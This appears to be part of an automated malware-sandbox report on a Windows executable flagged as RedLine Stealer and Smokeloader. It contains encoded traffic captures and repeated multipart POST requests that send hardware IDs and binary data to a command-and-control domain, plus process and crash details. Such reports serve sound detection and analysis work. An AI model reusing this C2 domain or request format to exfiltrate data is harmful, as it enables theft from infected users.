                                                                            2025-01-04 14:31:57 UTC1369INData Raw: 49 7a 71 62 56 58 2b 6b 43 64 2b 53 46 73 34 79 38 6e 70 59 71 30 64 47 2b 55 4b 4e 53 78 6b 51 34 5a 7a 58 43 52 69 68 41 7a 34 7a 37 46 58 55 75 57 4f 50 58 78 57 56 33 2f 63 6a 76 63 74 72 52 6c 64 73 6b 6c 39 62 69 70 42 6e 54 77 44 5a 55 4b 47 41 50 76 59 74 45 34 57 38 4d 38 72 4d 31 39 52 4f 49 7a 48 39 69 79 72 48 46 75 76 51 6a 59 72 62 31 53 4f 64 56 59 6f 59 70 73 4a 39 38 2b 35 57 46 7a 6c 6a 6a 68 33 56 56 42 2b 31 49 65 77 62 4f 6f 57 51 2f 30 53 66 51 4e 76 56 6f 4a 77 54 57 64 59 31 68 79 32 31 66 6c 59 57 71 2f 5a 63 6e 74 64 58 6e 76 66 69 50 4d 71 6f 51 4e 62 72 30 77 77 4a 58 68 41 67 48 4a 52 4a 6e 43 63 44 66 37 50 73 46 52 66 36 6f 59 32 4d 78 59 64 66 38 7a 48 71 47 4b 4c 48 46 43 78 51 43 6f 67 4b 6c 6e 4c 5a 52 73 69 62 74 5a 62
                                                                            Data Ascii: IzqbVX+kCd+SFs4y8npYq0dG+UKNSxkQ4ZzXCRihAz4z7FXUuWOPXxWV3/cjvctrRldskl9bipBnTwDZUKGAPvYtE4W8M8rM19ROIzH9iyrHFuvQjYrb1SOdVYoYpsJ98+5WFzljjh3VVB+1IewbOoWQ/0SfQNvVoJwTWdY1hy21flYWq/ZcntdXnvfiPMqoQNbr0wwJXhAgHJRJnCcDf7PsFRf6oY2MxYdf8zHqGKLHFCxQCogKlnLZRsibtZb
                                                                            2025-01-04 14:31:57 UTC1369INData Raw: 4d 57 6f 63 45 31 61 78 67 46 4f 50 36 45 35 43 47 67 55 32 36 2b 52 44 4d 6e 66 41 61 61 4d 6b 4a 6c 5a 5a 70 44 6f 49 79 30 58 6c 37 70 6b 7a 31 2b 57 31 4e 32 32 34 4c 2f 4b 71 6f 52 56 72 68 4f 4e 69 74 70 53 34 46 75 55 53 56 71 6b 77 4c 79 78 76 6b 52 46 75 69 5a 63 69 73 59 62 47 2f 66 78 63 55 68 70 42 39 63 71 77 6f 69 62 6e 4d 47 67 6e 41 62 66 53 4b 62 43 2f 33 4a 74 6c 35 63 34 59 51 34 66 31 42 54 65 38 61 49 39 43 4b 6d 47 56 47 77 52 44 6b 6f 59 30 32 4f 65 6c 73 6b 61 4e 5a 4e 75 4d 75 68 48 77 36 76 74 54 56 2f 56 56 49 36 34 59 54 2b 4c 4b 30 48 47 36 49 45 4a 47 42 74 53 73 55 6b 47 79 6c 72 6c 67 6a 79 79 4c 6c 59 57 2b 71 43 4e 58 42 56 57 6e 4c 61 67 50 51 75 6f 78 78 64 76 55 30 35 4a 58 68 44 6a 48 42 58 5a 53 7a 57 42 4f 43 4d 34
                                                                            Data Ascii: MWocE1axgFOP6E5CGgU26+RDMnfAaaMkJlZZpDoIy0Xl7pkz1+W1N224L/KqoRVrhONitpS4FuUSVqkwLyxvkRFuiZcisYbG/fxcUhpB9cqwoibnMGgnAbfSKbC/3Jtl5c4YQ4f1BTe8aI9CKmGVGwRDkoY02OelskaNZNuMuhHw6vtTV/VVI64YT+LK0HG6IEJGBtSsUkGylrlgjyyLlYW+qCNXBVWnLagPQuoxxdvU05JXhDjHBXZSzWBOCM4
                                                                            2025-01-04 14:31:57 UTC150INData Raw: 4e 63 69 73 59 56 48 48 47 69 66 34 72 70 78 64 54 75 6b 51 77 4b 32 78 4e 67 6e 74 64 4b 47 71 62 42 76 76 4e 76 56 56 45 37 49 6f 34 66 6c 49 64 4e 70 53 41 36 47 4c 79 55 58 79 78 59 79 30 37 65 46 44 46 59 78 55 38 49 70 45 50 75 4a 54 35 58 46 6e 6d 6a 6a 70 37 56 31 4a 38 32 6f 48 32 4c 36 38 65 55 61 39 43 4d 79 31 68 53 59 35 75 57 79 68 6d 6d 67 66 77 78 37 4d 66 47 4b 2b 47 4b 6a 4d 41 48 55 33 5a 69 50 41 68 76 46 46 45 38 31 4e 0d 0a
                                                                            Data Ascii: NcisYVHHGif4rpxdTukQwK2xNgntdKGqbBvvNvVVE7Io4flIdNpSA6GLyUXyxYy07eFDFYxU8IpEPuJT5XFnmjjp7V1J82oH2L68eUa9CMy1hSY5uWyhmmgfwx7MfGK+GKjMAHU3ZiPAhvFFE81N
                                                                            2025-01-04 14:31:57 UTC1369INData Raw: 34 30 35 39 0d 0a 39 4a 32 59 47 33 54 78 58 4b 32 4b 5a 44 2f 54 48 73 56 35 61 34 59 59 33 65 6c 42 56 61 74 57 44 2b 43 4f 6b 48 6c 71 35 54 7a 67 6b 62 55 4b 44 63 78 74 72 49 70 45 62 75 4a 54 35 63 48 48 61 77 78 4e 4a 47 45 49 32 7a 63 66 33 4c 75 70 4a 47 37 46 4a 4d 53 68 6c 51 49 78 77 55 53 78 70 6d 67 6a 38 77 4c 42 61 55 4f 36 45 4e 33 4a 63 55 58 4c 53 68 50 4d 74 70 52 35 54 2f 51 52 39 4a 33 49 47 33 54 78 2b 4d 6d 6d 59 42 62 6a 54 39 30 59 57 36 49 31 79 4b 78 68 52 63 64 4b 42 39 53 36 72 46 31 4f 34 51 6a 6b 68 62 45 43 47 63 31 38 67 59 35 6b 48 39 4d 4b 7a 58 6c 66 6a 69 6a 31 34 58 52 30 32 6c 49 44 6f 59 76 4a 52 61 72 35 63 4b 6a 42 6d 42 70 6f 79 51 6d 56 6c 6d 6b 4f 67 6a 4c 68 4e 58 4f 57 50 4e 33 78 64 58 6e 66 54 69 76 59 75
                                                                            Data Ascii: 40599J2YG3TxXK2KZD/THsV5a4YY3elBVatWD+COkHlq5TzgkbUKDcxtrIpEbuJT5cHHawxNJGEI2zcf3LupJG7FJMShlQIxwUSxpmgj8wLBaUO6EN3JcUXLShPMtpR5T/QR9J3IG3Tx+MmmYBbjT90YW6I1yKxhRcdKB9S6rF1O4QjkhbECGc18gY5kH9MKzXlfjij14XR02lIDoYvJRar5cKjBmBpoyQmVlmkOgjLhNXOWPN3xdXnfTivYu
                                                                            2025-01-04 14:31:57 UTC1369INData Raw: 55 4b 50 69 74 68 51 6f 56 77 57 79 46 76 6c 68 48 33 79 37 35 57 58 66 32 4c 4e 58 52 54 56 58 50 62 67 65 49 75 70 41 4e 65 72 31 68 39 62 69 70 42 6e 54 77 44 5a 56 53 52 45 2b 6a 50 2b 32 35 41 37 4a 63 35 66 6c 51 64 5a 35 71 65 73 43 57 6d 55 51 50 39 54 44 49 70 61 55 6d 45 64 56 63 6f 5a 35 38 47 2b 63 71 39 56 56 7a 76 68 7a 52 79 58 56 64 37 31 59 33 35 4a 61 49 57 57 4b 38 4b 63 32 42 74 58 73 55 6b 47 77 78 6c 68 41 33 6f 6a 4b 59 52 54 36 2b 47 50 6a 4d 41 48 58 7a 65 69 50 51 6c 70 68 64 65 75 30 63 38 4c 32 74 47 69 6e 68 51 4c 47 53 58 44 76 33 42 76 55 31 63 35 49 34 2b 65 6c 52 51 4f 4a 72 48 39 7a 72 71 53 52 75 4d 52 7a 4d 75 62 56 44 46 59 78 55 38 49 70 45 50 75 4a 54 35 58 6c 72 67 67 6a 31 77 57 31 78 79 78 70 58 38 4b 36 49 55 56
                                                                            Data Ascii: UKPithQoVwWyFvlhH3y75WXf2LNXRTVXPbgeIupANer1h9bipBnTwDZVSRE+jP+25A7Jc5flQdZ5qesCWmUQP9TDIpaUmEdVcoZ58G+cq9VVzvhzRyXVd71Y35JaIWWK8Kc2BtXsUkGwxlhA3ojKYRT6+GPjMAHXzeiPQlphdeu0c8L2tGinhQLGSXDv3BvU1c5I4+elRQOJrH9zrqSRuMRzMubVDFYxU8IpEPuJT5Xlrggj1wW1xyxpX8K6IUV
                                                                            2025-01-04 14:31:57 UTC1369INData Raw: 6e 5a 6c 43 4f 66 56 67 7a 62 34 5a 44 74 6f 79 6f 57 45 65 76 32 53 52 6a 54 31 70 6e 6d 70 36 77 4a 61 5a 52 41 2f 31 4d 4e 43 5a 74 51 49 74 75 58 69 4e 74 6d 51 72 78 79 4c 46 63 56 75 75 46 4e 58 5a 62 55 58 50 54 68 50 38 6d 6f 78 39 53 73 67 70 7a 59 47 31 65 78 53 51 62 42 48 6d 56 44 2f 57 4d 70 68 46 50 72 34 59 2b 4d 77 41 64 64 4e 71 43 38 43 69 73 46 56 36 37 51 44 67 67 59 55 57 4b 65 46 30 68 62 5a 59 49 38 63 32 2f 57 6c 7a 6b 68 7a 39 77 58 6c 73 34 6d 73 66 33 4f 75 70 4a 47 35 31 52 4d 43 78 74 42 70 6f 79 51 6d 56 6c 6d 6b 4f 67 6a 4c 4a 54 55 75 69 42 50 33 42 51 57 48 7a 65 67 76 41 71 75 42 6c 62 75 6c 67 76 49 47 4e 44 69 58 39 62 49 57 53 66 42 66 76 49 2b 52 45 57 36 4a 6c 79 4b 78 68 77 64 4e 4f 75 39 7a 6e 71 44 68 57 6b 43 6a
                                                                            Data Ascii: nZlCOfVgzb4ZDtoyoWEev2SRjT1pnmp6wJaZRA/1MNCZtQItuXiNtmQrxyLFcVuuFNXZbUXPThP8mox9SsgpzYG1exSQbBHmVD/WMphFPr4Y+MwAddNqC8CisFV67QDggYUWKeF0hbZYI8c2/Wlzkhz9wXls4msf3OupJG51RMCxtBpoyQmVlmkOgjLJTUuiBP3BQWHzegvAquBlbulgvIGNDiX9bIWSfBfvI+REW6JlyKxhwdNOu9znqDhWkCj
                                                                            2025-01-04 14:31:57 UTC1369INData Raw: 31 79 63 4f 64 6a 58 47 55 65 65 43 6f 42 39 41 72 39 6c 67 50 52 68 50 4f 49 7a 48 74 79 47 34 41 31 32 2b 58 44 35 6e 56 48 69 69 5a 6c 59 6a 64 59 63 39 78 73 75 6a 55 6c 44 34 6b 48 35 6d 57 31 4e 32 30 35 47 77 62 4f 6f 65 47 2b 56 7a 66 57 67 71 65 63 73 38 51 32 55 36 31 6a 62 37 77 72 64 59 51 50 37 4d 46 57 6c 56 57 32 2f 46 78 37 35 69 72 46 45 44 37 51 52 39 4a 48 73 47 33 53 77 4a 66 6a 66 46 56 4b 69 65 70 68 46 50 72 35 64 79 4b 77 6f 54 4f 4d 62 48 71 47 4c 74 45 6b 6d 76 54 44 34 32 61 51 47 37 51 6e 55 69 5a 4a 4d 45 36 49 36 58 56 45 4c 6f 77 58 77 7a 56 78 30 67 37 63 65 34 59 70 56 66 47 36 55 4b 5a 57 42 66 52 59 74 79 58 44 4e 7a 32 79 33 2f 79 72 78 59 52 71 32 76 4f 57 64 66 48 54 61 55 67 62 42 36 2b 6c 38 62 75 56 74 39 65 44 6f
                                                                            Data Ascii: 1ycOdjXGUeeCoB9Ar9lgPRhPOIzHtyG4A12+XD5nVHiiZlYjdYc9xsujUlD4kH5mW1N205GwbOoeG+VzfWgqecs8Q2U61jb7wrdYQP7MFWlVW2/Fx75irFED7QR9JHsG3SwJfjfFVKiephFPr5dyKwoTOMbHqGLtEkmvTD42aQG7QnUiZJME6I6XVELowXwzVx0g7ce4YpVfG6UKZWBfRYtyXDNz2y3/yrxYRq2vOWdfHTaUgbB6+l8buVt9eDo
                                                                            2025-01-04 14:31:57 UTC1369INData Raw: 51 4a 73 6b 51 4c 75 33 4b 35 51 47 63 47 33 45 30 31 6d 53 48 76 61 69 66 63 30 75 31 45 56 2f 55 56 39 65 46 4d 47 7a 54 78 6b 61 79 4b 4f 51 36 43 4d 6a 46 78 59 34 59 59 6b 59 68 56 36 64 74 4f 47 35 6a 4b 39 48 68 53 54 66 42 78 67 4a 41 61 44 50 41 4e 33 4c 4e 59 48 36 59 7a 68 44 77 53 30 31 47 45 6b 43 41 39 6e 6d 70 36 77 4e 4f 70 4a 43 66 4d 4b 4c 32 41 79 42 73 4a 2f 53 54 64 6b 6c 52 58 37 69 34 64 68 63 65 47 47 4d 32 56 49 55 48 54 31 68 4f 45 6f 6c 43 39 4f 76 6b 51 7a 4a 33 78 58 78 54 49 62 4b 69 4c 4f 4f 72 69 45 2b 57 41 59 72 35 6c 79 4b 78 68 6f 65 39 71 4a 39 7a 53 37 58 48 79 7a 54 54 77 32 65 6b 75 4a 58 56 67 30 61 4e 5a 4e 75 4d 72 35 42 77 53 68 77 54 5a 69 47 41 55 6f 68 74 79 6c 63 66 31 42 43 61 49 45 4a 47 42 38 42 74 30 75
                                                                            Data Ascii: QJskQLu3K5QGcG3E01mSHvaifc0u1EV/UV9eFMGzTxkayKOQ6CMjFxY4YYkYhV6dtOG5jK9HhSTfBxgJAaDPAN3LNYH6YzhDwS01GEkCA9nmp6wNOpJCfMKL2AyBsJ/STdklRX7i4dhceGGM2VIUHT1hOEolC9OvkQzJ3xXxTIbKiLOOriE+WAYr5lyKxhoe9qJ9zS7XHyzTTw2ekuJXVg0aNZNuMr5BwShwTZiGAUohtylcf1BCaIEJGB8Bt0u


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449733104.21.96.14433916C:\Users\user\Desktop\rdFy6abQ61.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-04 14:31:58 UTC281OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=H7RLDH9T1ERKF0YD9
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 18152
                                                                            Host: cloudewahsj.shop
                                                                            2025-01-04 14:31:58 UTC15331OUTData Raw: 2d 2d 48 37 52 4c 44 48 39 54 31 45 52 4b 46 30 59 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 30 43 43 38 45 30 30 38 44 33 30 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 48 37 52 4c 44 48 39 54 31 45 52 4b 46 30 59 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 37 52 4c 44 48 39 54 31 45 52 4b 46 30 59 44 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 48 37 52 4c
                                                                            Data Ascii: --H7RLDH9T1ERKF0YD9Content-Disposition: form-data; name="hwid"37E0CC8E008D304A822D1F4978021086--H7RLDH9T1ERKF0YD9Content-Disposition: form-data; name="pid"2--H7RLDH9T1ERKF0YD9Content-Disposition: form-data; name="lid"4h5VfH----H7RL
                                                                            2025-01-04 14:31:58 UTC2821OUTData Raw: 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc
                                                                            Data Ascii: h/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q
                                                                            2025-01-04 14:31:58 UTC1129INHTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:31:58 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=9e3uhneqad9opvhkd96btoo39k; expires=Wed, 30 Apr 2025 08:18:37 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Fb0CakmEko4TJvckgvpAA0Ip%2FYNxhflLRSJtqAjopqt9fg89z5sRORCLaGE8haJQ%2FU5m0MsOUAUDQTr4q6iGesPxCPO%2BZeOkHLtlAtO%2FJxz7gPuMx%2Bf5VisTcczUT6J4BHd"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef6cbc151a48-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2008&rtt_var=777&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19113&delivery_rate=1385856&cwnd=157&unsent_bytes=0&cid=ade8ca23a6c15368&ts=617&x=0"
                                                                            2025-01-04 14:31:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-04 14:31:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449734104.21.96.14433916C:\Users\user\Desktop\rdFy6abQ61.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-04 14:31:59 UTC281OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=MTFSOTV1TW6P64QDEZ
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8779
                                                                            Host: cloudewahsj.shop
                                                                            2025-01-04 14:31:59 UTC8779OUTData Raw: 2d 2d 4d 54 46 53 4f 54 56 31 54 57 36 50 36 34 51 44 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 30 43 43 38 45 30 30 38 44 33 30 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 4d 54 46 53 4f 54 56 31 54 57 36 50 36 34 51 44 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 54 46 53 4f 54 56 31 54 57 36 50 36 34 51 44 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4d
                                                                            Data Ascii: --MTFSOTV1TW6P64QDEZContent-Disposition: form-data; name="hwid"37E0CC8E008D304A822D1F4978021086--MTFSOTV1TW6P64QDEZContent-Disposition: form-data; name="pid"2--MTFSOTV1TW6P64QDEZContent-Disposition: form-data; name="lid"4h5VfH----M
                                                                            2025-01-04 14:32:00 UTC1133INHTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:32:00 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=u790ndc48occ8jn55uto2j48v1; expires=Wed, 30 Apr 2025 08:18:39 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2BNhhcY9RWsTCM0QdlvF3MyeQI8x6VsOUJ3EPcmRK5mlAMgtHZKdlNRxp%2BhM6sfchQtZtiWUNRpn%2Fenuhknk4i2krLdC%2BtYrWbIRAKgCKxhSx8%2FLwKziRZzxKJPNH%2B2%2F6%2Bmn"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef755edb4363-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1573&rtt_var=603&sent=11&recv=16&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9718&delivery_rate=1793611&cwnd=238&unsent_bytes=0&cid=d682e630bf4895f9&ts=1039&x=0"
                                                                            2025-01-04 14:32:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-04 14:32:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449735104.21.96.14433916C:\Users\user\Desktop\rdFy6abQ61.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-04 14:32:01 UTC279OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=MQVHS5L6YALPSOF
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20414
                                                                            Host: cloudewahsj.shop
                                                                            2025-01-04 14:32:01 UTC15331OUTData Raw: 2d 2d 4d 51 56 48 53 35 4c 36 59 41 4c 50 53 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 30 43 43 38 45 30 30 38 44 33 30 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 4d 51 56 48 53 35 4c 36 59 41 4c 50 53 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 51 56 48 53 35 4c 36 59 41 4c 50 53 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4d 51 56 48 53 35 4c 36 59 41
                                                                            Data Ascii: --MQVHS5L6YALPSOFContent-Disposition: form-data; name="hwid"37E0CC8E008D304A822D1F4978021086--MQVHS5L6YALPSOFContent-Disposition: form-data; name="pid"3--MQVHS5L6YALPSOFContent-Disposition: form-data; name="lid"4h5VfH----MQVHS5L6YA
                                                                            2025-01-04 14:32:01 UTC5083OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: lrQMn 64F6(X&7~`aO
                                                                            2025-01-04 14:32:01 UTC1129INHTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:32:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=87bo8gt9gtk4iudejdfm8i2qh2; expires=Wed, 30 Apr 2025 08:18:40 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N9FSHIepbvd42mFe28DohbBlIkKZ2q6K1Fixhl%2BOHoIsjT7dGebD%2BzXHsrRCkhmtbiO2dqcSqqcQjrPUHEbIBE9GC%2BazjDirG5SN%2BdxyZrTioO43E6dixR%2FLuWQALKeHt42Y"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef7ed9ba72a4-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1919&rtt_var=731&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21373&delivery_rate=1486005&cwnd=212&unsent_bytes=0&cid=dd9a1e7816129f8b&ts=642&x=0"
                                                                            2025-01-04 14:32:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-04 14:32:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:09:31:53
                                                                            Start date:04/01/2025
                                                                            Path:C:\Users\user\Desktop\rdFy6abQ61.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\rdFy6abQ61.exe"
                                                                            Imagebase:0x400000
                                                                            File size:324'096 bytes
                                                                            MD5 hash:7A3E26158D0BF299838749875FEB6232
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:09:32:02
                                                                            Start date:04/01/2025
                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1856
                                                                            Imagebase:0x940000
                                                                            File size:483'680 bytes
